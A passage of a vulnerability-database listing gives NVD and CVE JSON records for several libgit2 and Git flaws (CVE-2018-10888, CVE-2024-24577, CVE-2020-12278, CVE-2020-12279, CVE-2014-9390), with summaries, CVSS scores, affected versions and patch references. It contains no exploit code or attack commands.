"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", version: "3.1", }, exploitabilityScore: 2.8, impactScore: 3.6, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2018-03-14T00:29:00.657", references: [ { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/commit/58a6fe94cb851f71214dbefac3f9bffee437d6fe", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://libgit2.github.com/security/", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/commit/58a6fe94cb851f71214dbefac3f9bffee437d6fe", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://libgit2.github.com/security/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", }, ], sourceIdentifier: "cve@mitre.org", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-415", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Published
2018-07-10 14:29
Modified
2024-11-21 03:42
Severity ?
Summary
A flaw was found in libgit2 before version 0.27.3. A missing check in git_delta_apply function in delta.c file, may lead to an out-of-bound read while reading a binary delta file. An attacker may use this flaw to cause a Denial of Service.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| libgit2 | libgit2 | * | |
| debian | debian_linux | 8.0 | |
| debian | debian_linux | 9.0 |
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:libgit2:libgit2:*:*:*:*:*:*:*:*", matchCriteriaId: "733BF26A-72FB-4851-928E-4F7759FEF8E2", versionEndExcluding: "0.27.3", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", matchCriteriaId: "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", vulnerable: true, }, { criteria: "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", matchCriteriaId: "DEECE5FC-CACF-4496-A3E7-164736409252", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "A flaw was found in libgit2 before version 0.27.3. A missing check in git_delta_apply function in delta.c file, may lead to an out-of-bound read while reading a binary delta file. An attacker may use this flaw to cause a Denial of Service.", }, { lang: "es", value: "Se ha descubierto un problema en versiones anteriores a la 0.27.3 de libgit2. La falta de una comprobación en la función git_delta_apply en el archivo delta.c puede conducir a una lectura fuera de límites mientras se lee un archivo delta binario. Un atacante podría explotar este error para provocar una denegación de servicio (DoS).", }, ], id: "CVE-2018-10888", lastModified: "2024-11-21T03:42:13.817", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "MEDIUM", cvssData: { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 4.3, confidentialityImpact: "NONE", integrityImpact: "NONE", vectorString: "AV:N/AC:M/Au:N/C:N/I:N/A:P", version: "2.0", }, exploitabilityScore: 8.6, impactScore: 2.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: true, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 6.5, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", version: "3.1", }, exploitabilityScore: 2.8, impactScore: 3.6, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2018-07-10T14:29:00.323", references: [ { source: "secalert@redhat.com", tags: [ "Issue Tracking", "Patch", "Third Party Advisory", ], url: "https://bugzilla.redhat.com/show_bug.cgi?id=1598024", }, { source: "secalert@redhat.com", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/commit/9844d38bed10e9ff17174434b3421b227ae710f3", }, { source: "secalert@redhat.com", tags: [ "Patch", "Release Notes", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/releases/tag/v0.27.3", }, { source: "secalert@redhat.com", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2018/08/msg00024.html", }, { source: "secalert@redhat.com", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", "Patch", "Third Party Advisory", ], url: "https://bugzilla.redhat.com/show_bug.cgi?id=1598024", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/commit/9844d38bed10e9ff17174434b3421b227ae710f3", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Release Notes", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/releases/tag/v0.27.3", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2018/08/msg00024.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", }, ], sourceIdentifier: "secalert@redhat.com", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-20", }, ], source: "secalert@redhat.com", type: "Secondary", }, { description: [ { lang: "en", value: "CWE-125", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
cve-2018-10888
Vulnerability from cvelistv5
Published
2018-07-10 14:00
Modified
2024-09-16 16:18
Severity ?
EPSS score ?
Summary
A flaw was found in libgit2 before version 0.27.3. A missing check in git_delta_apply function in delta.c file, may lead to an out-of-bound read while reading a binary delta file. An attacker may use this flaw to cause a Denial of Service.
References
| ▼ | URL | Tags |
|---|---|---|
| https://github.com/libgit2/libgit2/commit/9844d38bed10e9ff17174434b3421b227ae710f3 | x_refsource_CONFIRM | |
| https://lists.debian.org/debian-lts-announce/2018/08/msg00024.html | mailing-list, x_refsource_MLIST | |
| https://github.com/libgit2/libgit2/releases/tag/v0.27.3 | x_refsource_CONFIRM | |
| https://bugzilla.redhat.com/show_bug.cgi?id=1598024 | x_refsource_CONFIRM | |
| https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html | mailing-list, x_refsource_MLIST |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-05T07:54:34.822Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/libgit2/libgit2/commit/9844d38bed10e9ff17174434b3421b227ae710f3", }, { name: "[debian-lts-announce] 20180825 [SECURITY] [DLA 1477-1] libgit2 security update", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.debian.org/debian-lts-announce/2018/08/msg00024.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/libgit2/libgit2/releases/tag/v0.27.3", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://bugzilla.redhat.com/show_bug.cgi?id=1598024", }, { name: "[debian-lts-announce] 20220321 [SECURITY] [DLA 2936-1] libgit2 security update", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "libgit2", vendor: "libgit2", versions: [ { status: "affected", version: "before version 0.27.3", }, ], }, ], datePublic: "2018-07-09T00:00:00", descriptions: [ { lang: "en", value: "A flaw was found in libgit2 before version 0.27.3. A missing check in git_delta_apply function in delta.c file, may lead to an out-of-bound read while reading a binary delta file. An attacker may use this flaw to cause a Denial of Service.", }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-20", description: "CWE-20->CWE-125", lang: "en", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2022-03-21T02:06:08", orgId: "53f830b8-0a3f-465b-8143-3b8a9948e749", shortName: "redhat", }, references: [ { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/libgit2/libgit2/commit/9844d38bed10e9ff17174434b3421b227ae710f3", }, { name: "[debian-lts-announce] 20180825 [SECURITY] [DLA 1477-1] libgit2 security update", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.debian.org/debian-lts-announce/2018/08/msg00024.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/libgit2/libgit2/releases/tag/v0.27.3", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://bugzilla.redhat.com/show_bug.cgi?id=1598024", }, { name: "[debian-lts-announce] 20220321 [SECURITY] [DLA 2936-1] libgit2 security update", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "secalert@redhat.com", DATE_PUBLIC: "2018-07-09T00:00:00", ID: "CVE-2018-10888", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "libgit2", version: { version_data: [ { version_value: "before version 0.27.3", }, ], }, }, ], }, vendor_name: "libgit2", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "A flaw was found in libgit2 before version 0.27.3. A missing check in git_delta_apply function in delta.c file, may lead to an out-of-bound read while reading a binary delta file. An attacker may use this flaw to cause a Denial of Service.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "CWE-20->CWE-125", }, ], }, ], }, references: { reference_data: [ { name: "https://github.com/libgit2/libgit2/commit/9844d38bed10e9ff17174434b3421b227ae710f3", refsource: "CONFIRM", url: "https://github.com/libgit2/libgit2/commit/9844d38bed10e9ff17174434b3421b227ae710f3", }, { name: "[debian-lts-announce] 20180825 [SECURITY] [DLA 1477-1] libgit2 security update", refsource: "MLIST", url: "https://lists.debian.org/debian-lts-announce/2018/08/msg00024.html", }, { name: "https://github.com/libgit2/libgit2/releases/tag/v0.27.3", refsource: "CONFIRM", url: "https://github.com/libgit2/libgit2/releases/tag/v0.27.3", }, { name: "https://bugzilla.redhat.com/show_bug.cgi?id=1598024", refsource: "CONFIRM", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1598024", }, { name: "[debian-lts-announce] 20220321 [SECURITY] [DLA 2936-1] libgit2 security update", refsource: "MLIST", url: "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "53f830b8-0a3f-465b-8143-3b8a9948e749", assignerShortName: "redhat", cveId: "CVE-2018-10888", datePublished: "2018-07-10T14:00:00Z", dateReserved: "2018-05-09T00:00:00", dateUpdated: "2024-09-16T16:18:17.644Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2024-24577
Vulnerability from cvelistv5
Published
2024-02-06 21:36
Modified
2025-02-13 17:40
Severity ?
EPSS score ?
Summary
libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing to build Git functionality into your application. Using well-crafted inputs to `git_index_add` can cause heap corruption that could be leveraged for arbitrary code execution. There is an issue in the `has_dir_name` function in `src/libgit2/index.c`, which frees an entry that should not be freed. The freed entry is later used and overwritten with potentially bad actor-controlled data leading to controlled heap corruption. Depending on the application that uses libgit2, this could lead to arbitrary code execution. This issue has been patched in version 1.6.5 and 1.7.2.
References
Impacted products
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-01T23:19:52.907Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { name: "https://github.com/libgit2/libgit2/security/advisories/GHSA-j2v7-4f6v-gpg8", tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/libgit2/libgit2/security/advisories/GHSA-j2v7-4f6v-gpg8", }, { name: "https://github.com/libgit2/libgit2/releases/tag/v1.6.5", tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://github.com/libgit2/libgit2/releases/tag/v1.6.5", }, { name: "https://github.com/libgit2/libgit2/releases/tag/v1.7.2", tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://github.com/libgit2/libgit2/releases/tag/v1.7.2", }, { tags: [ "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/S635BGHHZUMRPI7QOXOJ45QHDD5FFZ3S/", }, { tags: [ "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4M3P7WIEPXNRLBINQRJFXUSTNKBCHYC7/", }, { tags: [ "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7CNDW3PF6NHO7OXNM5GN6WSSGAMA7MZE/", }, { tags: [ "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z6MXOX7I43OWNN7R6M54XLG6U5RXY244/", }, { tags: [ "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZGNHOEE2RBLH7KCJUPUNYG4CDTW4HTBT/", }, { tags: [ "x_transferred", ], url: "https://lists.debian.org/debian-lts-announce/2024/02/msg00012.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "libgit2", vendor: "libgit2", versions: [ { status: "affected", version: "< 1.6.5", }, { status: "affected", version: ">= 1.7.0, < 1.7.2", }, ], }, ], descriptions: [ { lang: "en", value: "libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing to build Git functionality into your application. Using well-crafted inputs to `git_index_add` can cause heap corruption that could be leveraged for arbitrary code execution. There is an issue in the `has_dir_name` function in `src/libgit2/index.c`, which frees an entry that should not be freed. The freed entry is later used and overwritten with potentially bad actor-controlled data leading to controlled heap corruption. Depending on the application that uses libgit2, this could lead to arbitrary code execution. This issue has been patched in version 1.6.5 and 1.7.2.", }, ], metrics: [ { cvssV3_1: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 8.6, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L", version: "3.1", }, }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-122", description: "CWE-122: Heap-based Buffer Overflow", lang: "en", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2024-02-27T10:05:57.264Z", orgId: "a0819718-46f1-4df5-94e2-005712e83aaa", shortName: "GitHub_M", }, references: [ { name: "https://github.com/libgit2/libgit2/security/advisories/GHSA-j2v7-4f6v-gpg8", tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/libgit2/libgit2/security/advisories/GHSA-j2v7-4f6v-gpg8", }, { name: "https://github.com/libgit2/libgit2/releases/tag/v1.6.5", tags: [ "x_refsource_MISC", ], url: "https://github.com/libgit2/libgit2/releases/tag/v1.6.5", }, { name: "https://github.com/libgit2/libgit2/releases/tag/v1.7.2", tags: [ "x_refsource_MISC", ], url: "https://github.com/libgit2/libgit2/releases/tag/v1.7.2", }, { url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/S635BGHHZUMRPI7QOXOJ45QHDD5FFZ3S/", }, { url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4M3P7WIEPXNRLBINQRJFXUSTNKBCHYC7/", }, { url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7CNDW3PF6NHO7OXNM5GN6WSSGAMA7MZE/", }, { url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z6MXOX7I43OWNN7R6M54XLG6U5RXY244/", }, { url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZGNHOEE2RBLH7KCJUPUNYG4CDTW4HTBT/", }, { url: "https://lists.debian.org/debian-lts-announce/2024/02/msg00012.html", }, ], source: { advisory: "GHSA-j2v7-4f6v-gpg8", discovery: "UNKNOWN", }, title: "libgit2 is vulnerable to arbitrary code execution due to heap corruption in `git_index_add`", }, }, cveMetadata: { assignerOrgId: "a0819718-46f1-4df5-94e2-005712e83aaa", assignerShortName: "GitHub_M", cveId: "CVE-2024-24577", datePublished: "2024-02-06T21:36:12.517Z", dateReserved: "2024-01-25T15:09:40.211Z", dateUpdated: "2025-02-13T17:40:14.754Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2020-12278
Vulnerability from cvelistv5
Published
2020-04-27 00:00
Modified
2024-08-04 11:48
Severity ?
EPSS score ?
Summary
An issue was discovered in libgit2 before 0.28.4 and 0.9x before 0.99.0. path.c mishandles equivalent filenames that exist because of NTFS Alternate Data Streams. This may allow remote code execution when cloning a repository. This issue is similar to CVE-2019-1352.
References
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-04T11:48:58.550Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_transferred", ], url: "https://github.com/git/git/security/advisories/GHSA-5wph-8frv-58vj", }, { tags: [ "x_transferred", ], url: "https://github.com/libgit2/libgit2/releases/tag/v0.99.0", }, { tags: [ "x_transferred", ], url: "https://github.com/libgit2/libgit2/releases/tag/v0.28.4", }, { tags: [ "x_transferred", ], url: "https://github.com/libgit2/libgit2/commit/3f7851eadca36a99627ad78cbe56a40d3776ed01", }, { tags: [ "x_transferred", ], url: "https://github.com/libgit2/libgit2/commit/e1832eb20a7089f6383cfce474f213157f5300cb", }, { name: "[debian-lts-announce] 20220321 [SECURITY] [DLA 2936-1] libgit2 security update", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", }, { name: "[debian-lts-announce] 20230223 [SECURITY] [DLA 3340-1] libgit2 security update", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.debian.org/debian-lts-announce/2023/02/msg00034.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "n/a", vendor: "n/a", versions: [ { status: "affected", version: "n/a", }, ], }, ], descriptions: [ { lang: "en", value: "An issue was discovered in libgit2 before 0.28.4 and 0.9x before 0.99.0. path.c mishandles equivalent filenames that exist because of NTFS Alternate Data Streams. This may allow remote code execution when cloning a repository. This issue is similar to CVE-2019-1352.", }, ], problemTypes: [ { descriptions: [ { description: "n/a", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2023-02-23T00:00:00", orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", shortName: "mitre", }, references: [ { url: "https://github.com/git/git/security/advisories/GHSA-5wph-8frv-58vj", }, { url: "https://github.com/libgit2/libgit2/releases/tag/v0.99.0", }, { url: "https://github.com/libgit2/libgit2/releases/tag/v0.28.4", }, { url: "https://github.com/libgit2/libgit2/commit/3f7851eadca36a99627ad78cbe56a40d3776ed01", }, { url: "https://github.com/libgit2/libgit2/commit/e1832eb20a7089f6383cfce474f213157f5300cb", }, { name: "[debian-lts-announce] 20220321 [SECURITY] [DLA 2936-1] libgit2 security update", tags: [ "mailing-list", ], url: "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", }, { name: "[debian-lts-announce] 20230223 [SECURITY] [DLA 3340-1] libgit2 security update", tags: [ "mailing-list", ], url: "https://lists.debian.org/debian-lts-announce/2023/02/msg00034.html", }, ], }, }, cveMetadata: { assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", assignerShortName: "mitre", cveId: "CVE-2020-12278", datePublished: "2020-04-27T00:00:00", dateReserved: "2020-04-27T00:00:00", dateUpdated: "2024-08-04T11:48:58.550Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2020-12279
Vulnerability from cvelistv5
Published
2020-04-27 00:00
Modified
2024-08-04 11:48
Severity ?
EPSS score ?
Summary
An issue was discovered in libgit2 before 0.28.4 and 0.9x before 0.99.0. checkout.c mishandles equivalent filenames that exist because of NTFS short names. This may allow remote code execution when cloning a repository. This issue is similar to CVE-2019-1353.
References
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-04T11:48:58.767Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_transferred", ], url: "https://github.com/libgit2/libgit2/releases/tag/v0.99.0", }, { tags: [ "x_transferred", ], url: "https://github.com/libgit2/libgit2/releases/tag/v0.28.4", }, { tags: [ "x_transferred", ], url: "https://github.com/git/git/security/advisories/GHSA-589j-mmg9-733v", }, { tags: [ "x_transferred", ], url: "https://github.com/libgit2/libgit2/commit/64c612cc3e25eff5fb02c59ef5a66ba7a14751e4", }, { name: "[debian-lts-announce] 20220321 [SECURITY] [DLA 2936-1] libgit2 security update", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", }, { name: "[debian-lts-announce] 20230223 [SECURITY] [DLA 3340-1] libgit2 security update", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.debian.org/debian-lts-announce/2023/02/msg00034.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "n/a", vendor: "n/a", versions: [ { status: "affected", version: "n/a", }, ], }, ], descriptions: [ { lang: "en", value: "An issue was discovered in libgit2 before 0.28.4 and 0.9x before 0.99.0. checkout.c mishandles equivalent filenames that exist because of NTFS short names. This may allow remote code execution when cloning a repository. This issue is similar to CVE-2019-1353.", }, ], problemTypes: [ { descriptions: [ { description: "n/a", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2023-02-23T00:00:00", orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", shortName: "mitre", }, references: [ { url: "https://github.com/libgit2/libgit2/releases/tag/v0.99.0", }, { url: "https://github.com/libgit2/libgit2/releases/tag/v0.28.4", }, { url: "https://github.com/git/git/security/advisories/GHSA-589j-mmg9-733v", }, { url: "https://github.com/libgit2/libgit2/commit/64c612cc3e25eff5fb02c59ef5a66ba7a14751e4", }, { name: "[debian-lts-announce] 20220321 [SECURITY] [DLA 2936-1] libgit2 security update", tags: [ "mailing-list", ], url: "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", }, { name: "[debian-lts-announce] 20230223 [SECURITY] [DLA 3340-1] libgit2 security update", tags: [ "mailing-list", ], url: "https://lists.debian.org/debian-lts-announce/2023/02/msg00034.html", }, ], }, }, cveMetadata: { assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", assignerShortName: "mitre", cveId: "CVE-2020-12279", datePublished: "2020-04-27T00:00:00", dateReserved: "2020-04-27T00:00:00", dateUpdated: "2024-08-04T11:48:58.767Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2014-9390
Vulnerability from cvelistv5
Published
2020-02-12 01:58
Modified
2024-08-06 13:40
Severity ?
EPSS score ?
Summary
Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine all versions before 08-12-2014; libgit2 all versions up to 0.21.2; Egit all versions before 08-12-2014; and JGit all versions before 08-12-2014 allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem.
References
| ▼ | URL | Tags |
|---|---|---|
| https://news.ycombinator.com/item?id=8769667 | x_refsource_MISC | |
| http://article.gmane.org/gmane.linux.kernel/1853266 | x_refsource_MISC | |
| http://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html | x_refsource_MISC | |
| http://mercurial.selenic.com/wiki/WhatsNew | x_refsource_MISC | |
| http://support.apple.com/kb/HT204147 | x_refsource_MISC | |
| https://github.com/blog/1938-git-client-vulnerability-announced | x_refsource_MISC | |
| http://securitytracker.com/id?1031404 | x_refsource_MISC | |
| https://github.com/libgit2/libgit2/commit/928429c5c96a701bcbcafacb2421a82602b36915 | x_refsource_MISC | |
| https://libgit2.org/security/ | x_refsource_MISC |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-06T13:40:25.038Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://news.ycombinator.com/item?id=8769667", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "http://article.gmane.org/gmane.linux.kernel/1853266", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "http://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "http://mercurial.selenic.com/wiki/WhatsNew", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "http://support.apple.com/kb/HT204147", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://github.com/blog/1938-git-client-vulnerability-announced", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "http://securitytracker.com/id?1031404", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://github.com/libgit2/libgit2/commit/928429c5c96a701bcbcafacb2421a82602b36915", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://libgit2.org/security/", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "n/a", vendor: "n/a", versions: [ { status: "affected", version: "n/a", }, ], }, ], datePublic: "2014-12-18T00:00:00", descriptions: [ { lang: "en", value: "Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine all versions before 08-12-2014; libgit2 all versions up to 0.21.2; Egit all versions before 08-12-2014; and JGit all versions before 08-12-2014 allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem.", }, ], problemTypes: [ { descriptions: [ { description: "n/a", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2020-09-09T17:07:52", orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", shortName: "mitre", }, references: [ { tags: [ "x_refsource_MISC", ], url: "https://news.ycombinator.com/item?id=8769667", }, { tags: [ "x_refsource_MISC", ], url: "http://article.gmane.org/gmane.linux.kernel/1853266", }, { tags: [ "x_refsource_MISC", ], url: "http://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html", }, { tags: [ "x_refsource_MISC", ], url: "http://mercurial.selenic.com/wiki/WhatsNew", }, { tags: [ "x_refsource_MISC", ], url: "http://support.apple.com/kb/HT204147", }, { tags: [ "x_refsource_MISC", ], url: "https://github.com/blog/1938-git-client-vulnerability-announced", }, { tags: [ "x_refsource_MISC", ], url: "http://securitytracker.com/id?1031404", }, { tags: [ "x_refsource_MISC", ], url: "https://github.com/libgit2/libgit2/commit/928429c5c96a701bcbcafacb2421a82602b36915", }, { tags: [ "x_refsource_MISC", ], url: "https://libgit2.org/security/", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "cve@mitre.org", ID: "CVE-2014-9390", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "n/a", version: { version_data: [ { version_value: "n/a", }, ], }, }, ], }, vendor_name: "n/a", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine all versions before 08-12-2014; libgit2 all versions up to 0.21.2; Egit all versions before 08-12-2014; and JGit all versions before 08-12-2014 allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "n/a", }, ], }, ], }, references: { reference_data: [ { name: "https://news.ycombinator.com/item?id=8769667", refsource: "MISC", url: "https://news.ycombinator.com/item?id=8769667", }, { name: "http://article.gmane.org/gmane.linux.kernel/1853266", refsource: "MISC", url: "http://article.gmane.org/gmane.linux.kernel/1853266", }, { name: "http://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html", refsource: "MISC", url: "http://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html", }, { name: "http://mercurial.selenic.com/wiki/WhatsNew", refsource: "MISC", url: "http://mercurial.selenic.com/wiki/WhatsNew", }, { name: "http://support.apple.com/kb/HT204147", refsource: "MISC", url: "http://support.apple.com/kb/HT204147", }, { name: "https://github.com/blog/1938-git-client-vulnerability-announced", refsource: "MISC", 